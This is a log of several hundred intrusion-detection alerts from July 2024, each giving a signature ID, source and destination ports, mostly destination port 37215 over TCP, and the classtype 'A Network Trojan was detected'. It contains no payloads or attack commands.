                  Timestamp:07/10/24-08:26:38.536565
                  SID:2829579
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2835222
                  Source Port:39378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992433
                  SID:2829579
                  Source Port:44788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278006
                  SID:2829579
                  Source Port:49724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.343465
                  SID:2829579
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:59814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.506153
                  SID:2829579
                  Source Port:54846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:43022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.435819
                  SID:2829579
                  Source Port:54666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.355294
                  SID:2829579
                  Source Port:60162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2829579
                  Source Port:33728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.514573
                  SID:2829579
                  Source Port:33380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2829579
                  Source Port:42252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528584
                  SID:2829579
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.195980
                  SID:2829579
                  Source Port:49524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609606
                  SID:2835222
                  Source Port:38648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.711172
                  SID:2835222
                  Source Port:41648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.387437
                  SID:2829579
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029476
                  SID:2835222
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262115
                  SID:2835222
                  Source Port:34772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2835222
                  Source Port:50642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061341
                  SID:2835222
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2835222
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2835222
                  Source Port:49344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648560
                  SID:2829579
                  Source Port:48608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306995
                  SID:2829579
                  Source Port:57074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2835222
                  Source Port:53566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.422156
                  SID:2835222
                  Source Port:39228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.899186
                  SID:2829579
                  Source Port:53296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875451
                  SID:2829579
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2835222
                  Source Port:58904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2835222
                  Source Port:36848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2829579
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037759
                  SID:2835222
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468804
                  SID:2835222
                  Source Port:38188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.244914
                  SID:2835222
                  Source Port:48124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2835222
                  Source Port:52338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2835222
                  Source Port:33440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.377944
                  SID:2829579
                  Source Port:56312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900160
                  SID:2829579
                  Source Port:37356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603440
                  SID:2829579
                  Source Port:53604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2835222
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814573
                  SID:2829579
                  Source Port:43286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.418339
                  SID:2835222
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.861784
                  SID:2835222
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549258
                  SID:2829579
                  Source Port:50762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183998
                  SID:2835222
                  Source Port:56014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.264722
                  SID:2835222
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.924330
                  SID:2829579
                  Source Port:37684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587332
                  SID:2835222
                  Source Port:47570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2835222
                  Source Port:39472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2835222
                  Source Port:58520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2829579
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.447819
                  SID:2829579
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069203
                  SID:2829579
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.592114
                  SID:2829579
                  Source Port:43368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.588924
                  SID:2835222
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2829579
                  Source Port:33886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2835222
                  Source Port:37922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.639847
                  SID:2829579
                  Source Port:48782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2829579
                  Source Port:37090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2829579
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2835222
                  Source Port:37346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161140
                  SID:2829579
                  Source Port:55720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2829579
                  Source Port:36890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.776724
                  SID:2835222
                  Source Port:60554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854210
                  SID:2835222
                  Source Port:34682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2835222
                  Source Port:49632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.819224
                  SID:2829579
                  Source Port:37908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051351
                  SID:2835222
                  Source Port:48344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.821123
                  SID:2829579
                  Source Port:59042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2835222
                  Source Port:45382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2829579
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601191
                  SID:2829579
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.718620
                  SID:2829579
                  Source Port:42466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148384
                  SID:2829579
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259693
                  SID:2829579
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896950
                  SID:2835222
                  Source Port:43898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2835222
                  Source Port:53312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.333878
                  SID:2835222
                  Source Port:53300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862299
                  SID:2835222
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.385136
                  SID:2829579
                  Source Port:47330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019340
                  SID:2829579
                  Source Port:56980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.112996
                  SID:2835222
                  Source Port:43546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2835222
                  Source Port:39950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2829579
                  Source Port:45404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.373559
                  SID:2835222
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867570
                  SID:2835222
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245914
                  SID:2835222
                  Source Port:34264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.283034
                  SID:2835222
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370410
                  SID:2829579
                  Source Port:46766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302695
                  SID:2835222
                  Source Port:47584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.292771
                  SID:2829579
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.039425
                  SID:2835222
                  Source Port:48554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2835222
                  Source Port:34480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181410
                  SID:2835222
                  Source Port:38468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2829579
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386958
                  SID:2835222
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.632458
                  SID:2829579
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2835222
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992785
                  SID:2835222
                  Source Port:42926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2829579
                  Source Port:48740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2835222
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151316
                  SID:2829579
                  Source Port:48728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224189
                  SID:2835222
                  Source Port:37702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110610
                  SID:2835222
                  Source Port:59446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.379433
                  SID:2835222
                  Source Port:45936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:47444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.622921
                  SID:2835222
                  Source Port:42738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2829579
                  Source Port:52406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383966
                  SID:2835222
                  Source Port:45782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2829579
                  Source Port:40976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2829579
                  Source Port:40140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882504
                  SID:2835222
                  Source Port:47082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2835222
                  Source Port:46706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.220771
                  SID:2829579
                  Source Port:48834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275734
                  SID:2829579
                  Source Port:38588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633104
                  SID:2835222
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2829579
                  Source Port:33270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2835222
                  Source Port:57422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.837013
                  SID:2835222
                  Source Port:59742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.161022
                  SID:2829579
                  Source Port:56522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2835222
                  Source Port:36574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.842727
                  SID:2829579
                  Source Port:36322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.168887
                  SID:2829579
                  Source Port:56230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.662577
                  SID:2829579
                  Source Port:57518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2829579
                  Source Port:32872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806143
                  SID:2829579
                  Source Port:44012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652707
                  SID:2829579
                  Source Port:44790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2835222
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.800548
                  SID:2829579
                  Source Port:54630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178159
                  SID:2835222
                  Source Port:45356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2829579
                  Source Port:36630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.352655
                  SID:2829579
                  Source Port:51576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867172
                  SID:2835222
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.974355
                  SID:2829579
                  Source Port:44232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.495020
                  SID:2829579
                  Source Port:43986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2835222
                  Source Port:36344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481124
                  SID:2829579
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575874
                  SID:2829579
                  Source Port:42858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122703
                  SID:2829579
                  Source Port:47610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.815817
                  SID:2829579
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2835222
                  Source Port:50576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2829579
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:58670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.588924
                  SID:2829579
                  Source Port:38108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348136
                  SID:2835222
                  Source Port:40576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.157314
                  SID:2829579
                  Source Port:40194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467971
                  SID:2829579
                  Source Port:55532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117447
                  SID:2829579
                  Source Port:35822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.851109
                  SID:2835222
                  Source Port:34624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.346552
                  SID:2829579
                  Source Port:32828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.342847
                  SID:2829579
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2829579
                  Source Port:58902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490164
                  SID:2835222
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2829579
                  Source Port:37104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151906
                  SID:2835222
                  Source Port:50080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.117679
                  SID:2829579
                  Source Port:43610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.792875
                  SID:2030490
                  Source Port:52938
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2835222
                  Source Port:32866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.653833
                  SID:2829579
                  Source Port:53934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389913
                  SID:2835222
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262115
                  SID:2829579
                  Source Port:41164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490780
                  SID:2835222
                  Source Port:59190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2829579
                  Source Port:54822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.555542
                  SID:2835222
                  Source Port:40228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.161125
                  SID:2829579
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.803828
                  SID:2835222
                  Source Port:40024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.531122
                  SID:2829579
                  Source Port:40528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2835222
                  Source Port:33362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.592114
                  SID:2835222
                  Source Port:59422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011354
                  SID:2829579
                  Source Port:55074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636765
                  SID:2829579
                  Source Port:55430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2829579
                  Source Port:50672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2829579
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536495
                  SID:2829579
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012049
                  SID:2829579
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.820536
                  SID:2835222
                  Source Port:48604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2835222
                  Source Port:33744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013452
                  SID:2835222
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.001228
                  SID:2835222
                  Source Port:48450
                  Destination Port:37215
                  Protocol:TCP
